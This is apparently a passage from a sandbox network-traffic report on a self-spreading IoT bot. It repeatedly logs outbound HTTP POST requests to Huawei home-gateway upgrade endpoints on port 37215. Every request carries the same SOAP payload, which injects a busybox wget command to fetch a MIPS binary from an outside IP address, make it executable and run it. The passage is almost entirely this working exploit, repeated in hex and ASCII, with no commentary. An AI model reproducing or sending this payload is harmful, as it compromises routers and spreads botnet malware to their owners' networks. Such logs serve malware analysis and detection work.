                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6192.168.2.2344662197.55.193.14537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102266073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7192.168.2.2358056197.126.181.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102267027 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8192.168.2.233942841.155.18.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102281094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9192.168.2.2334812207.230.18.12837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102283955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10192.168.2.233749032.70.63.13637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102292061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11192.168.2.2340452197.42.140.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102299929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12192.168.2.2334260157.212.119.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102313042 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13192.168.2.2332816157.157.26.18237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102324009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          14192.168.2.2343090157.193.222.24837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102345943 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15192.168.2.233512241.188.130.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102355003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
